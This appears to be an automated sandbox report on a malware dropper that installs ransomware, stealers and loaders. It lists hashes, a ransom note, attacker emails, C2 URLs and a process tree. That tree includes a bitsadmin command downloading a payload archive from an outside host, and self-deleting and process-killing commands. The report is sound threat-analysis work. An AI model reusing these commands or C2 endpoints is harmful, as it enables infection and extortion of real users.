Resubmissions

24-04-2021 20:28

210424-217qe8tpzs 10

24-04-2021 19:14

210424-6ffz35kxsx 10

24-04-2021 19:14

210424-ymq8bz33ts 10

24-04-2021 19:13

210424-2xx4hckd6s 10

24-04-2021 19:13

210424-4wwwcb3ajj 10

24-04-2021 15:54

210424-426ksbtgsa 10

24-04-2021 08:51

210424-1tz5lee51n 10

24-04-2021 06:41

210424-kfsqa5cgvx 10

Analysis

  • max time kernel
    1800s
  • max time network
    1715s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 19:13

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: rootiunik@cock.li and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: rootiunik@cock.li Reserved email: TimothyCrabtree@protonmail.com Your personal ID: 85A-6F2-D30 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

rootiunik@cock.li

TimothyCrabtree@protonmail.com

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://al-commandoz.com/upload/

http://antalya-belek.com/upload/

http://luxurysv.com/upload/

http://massagespijkenisse.com/upload/

http://rexgorellhondaevent.com/upload/

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

rc4.i32
rc4.i32

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 34 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:996
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1180
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1172
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
          1⤵
          • Drops file in System32 directory
          PID:344
          • C:\Users\Admin\AppData\Roaming\eiedvfv
            C:\Users\Admin\AppData\Roaming\eiedvfv
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:6084
          • C:\Users\Admin\AppData\Roaming\gwedvfv
            C:\Users\Admin\AppData\Roaming\gwedvfv
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:6064
            • C:\Users\Admin\AppData\Roaming\gwedvfv
              C:\Users\Admin\AppData\Roaming\gwedvfv
              3⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:2072
          • C:\Users\Admin\AppData\Roaming\eiedvfv
            C:\Users\Admin\AppData\Roaming\eiedvfv
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:388
          • C:\Users\Admin\AppData\Roaming\gwedvfv
            C:\Users\Admin\AppData\Roaming\gwedvfv
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:4556
            • C:\Users\Admin\AppData\Roaming\gwedvfv
              C:\Users\Admin\AppData\Roaming\gwedvfv
              3⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:4264
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1352
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1376
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1964
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2856
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                  1⤵
                    PID:2804
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2796
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2540
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2504
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3176
                      • C:\Users\Admin\AppData\Local\Temp\is-5K4EP.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-5K4EP.tmp\Install.tmp" /SL5="$900F4,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:2064
                        • C:\Users\Admin\AppData\Local\Temp\is-7HLND.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-7HLND.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3464
                          • C:\Program Files\Reference Assemblies\CCCPIAAFQF\ultramediaburner.exe
                            "C:\Program Files\Reference Assemblies\CCCPIAAFQF\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2068
                            • C:\Users\Admin\AppData\Local\Temp\is-CQNHM.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-CQNHM.tmp\ultramediaburner.tmp" /SL5="$5006C,281924,62464,C:\Program Files\Reference Assemblies\CCCPIAAFQF\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:2876
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3988
                          • C:\Users\Admin\AppData\Local\Temp\5c-e5449-593-35f9b-9177bcc495475\Qyqocizhupi.exe
                            "C:\Users\Admin\AppData\Local\Temp\5c-e5449-593-35f9b-9177bcc495475\Qyqocizhupi.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3416
                          • C:\Users\Admin\AppData\Local\Temp\e7-b673a-6e6-3d391-260c1cf6d9617\Fyjabixovae.exe
                            "C:\Users\Admin\AppData\Local\Temp\e7-b673a-6e6-3d391-260c1cf6d9617\Fyjabixovae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2548
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onulip3e.fu0\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4836
                              • C:\Users\Admin\AppData\Local\Temp\onulip3e.fu0\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\onulip3e.fu0\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4956
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30dztlli.tvg\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4828
                              • C:\Users\Admin\AppData\Local\Temp\30dztlli.tvg\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\30dztlli.tvg\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:5044
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                    PID:5124
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sbhmuoh4.33a\md1_1eaf.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5804
                                • C:\Users\Admin\AppData\Local\Temp\sbhmuoh4.33a\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\sbhmuoh4.33a\md1_1eaf.exe
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5968
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 4524
                                    7⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:2884
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ki5mopdc.5bg\y1.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4232
                                • C:\Users\Admin\AppData\Local\Temp\ki5mopdc.5bg\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\ki5mopdc.5bg\y1.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5040
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ki5mopdc.5bg\y1.exe"
                                    7⤵
                                    • Blocklisted process makes network request
                                    PID:2064
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:1888
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42kdtlp3.kau\askinstall39.exe & exit
                                5⤵
                                  PID:3864
                                  • C:\Users\Admin\AppData\Local\Temp\42kdtlp3.kau\askinstall39.exe
                                    C:\Users\Admin\AppData\Local\Temp\42kdtlp3.kau\askinstall39.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:5976
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      7⤵
                                        PID:5564
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          8⤵
                                          • Kills process with taskkill
                                          PID:6012
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rxyd3ny.jqi\inst.exe & exit
                                    5⤵
                                      PID:2124
                                      • C:\Users\Admin\AppData\Local\Temp\1rxyd3ny.jqi\inst.exe
                                        C:\Users\Admin\AppData\Local\Temp\1rxyd3ny.jqi\inst.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3016
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hrz0qrnu.xfl\SunLabsPlayer.exe /S & exit
                                      5⤵
                                        PID:5252
                                        • C:\Users\Admin\AppData\Local\Temp\hrz0qrnu.xfl\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\hrz0qrnu.xfl\SunLabsPlayer.exe /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5784
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4276
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                              7⤵
                                                PID:196
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                    PID:2124
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5436
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:6080
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5844
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5676
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                            • Loads dropped DLL
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:5124
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                          7⤵
                                                          • Checks for any installed AV software in registry
                                                          PID:5816
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          7⤵
                                                          • Download via BitsAdmin
                                                          PID:900
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pK2IQC0j7i1EXgju -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:3176
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5024
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                              PID:5260
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5844
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:1864
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:2536
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:3888
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4284
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\GdVzvqerHYFl\GdVzvqerHYFl.dll" GdVzvqerHYFl
                                                                      7⤵
                                                                        PID:5604
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\GdVzvqerHYFl\GdVzvqerHYFl.dll" GdVzvqerHYFl
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in System32 directory
                                                                          PID:5648
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:6104
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:2984
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5268
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5308
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg88B0.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:992
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:2208
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayb3q3cy.yh4\GcleanerWW.exe /mixone & exit
                                                                            5⤵
                                                                              PID:4180
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqmbdwoi.lz3\toolspab1.exe & exit
                                                                              5⤵
                                                                                PID:1888
                                                                                • C:\Users\Admin\AppData\Local\Temp\xqmbdwoi.lz3\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\xqmbdwoi.lz3\toolspab1.exe
                                                                                  6⤵
                                                                                    PID:1632
                                                                                    • C:\Users\Admin\AppData\Local\Temp\xqmbdwoi.lz3\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\xqmbdwoi.lz3\toolspab1.exe
                                                                                      7⤵
                                                                                        PID:5308
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hdyd3djp.tv2\c7ae36fa.exe & exit
                                                                                    5⤵
                                                                                      PID:1808
                                                                                      • C:\Users\Admin\AppData\Local\Temp\hdyd3djp.tv2\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\hdyd3djp.tv2\c7ae36fa.exe
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:3276
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zt2xbide.um1\app.exe /8-2222 & exit
                                                                                      5⤵
                                                                                        PID:4556
                                                                                        • C:\Users\Admin\AppData\Local\Temp\zt2xbide.um1\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\zt2xbide.um1\app.exe /8-2222
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5352
                                                                                          • C:\Users\Admin\AppData\Local\Temp\zt2xbide.um1\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\zt2xbide.um1\app.exe" /8-2222
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:6096
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                1⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:636
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Checks processor information in registry
                                                                                  • Modifies registry class
                                                                                  PID:5220
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                1⤵
                                                                                • Drops file in Windows directory
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:4508
                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                PID:4564
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:5016
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1676
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:5620
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:5140
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:1320
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                1⤵
                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                PID:5460
                                                                              • C:\Users\Admin\AppData\Local\Temp\1A3B.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\1A3B.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Enumerates connected drives
                                                                                PID:5484
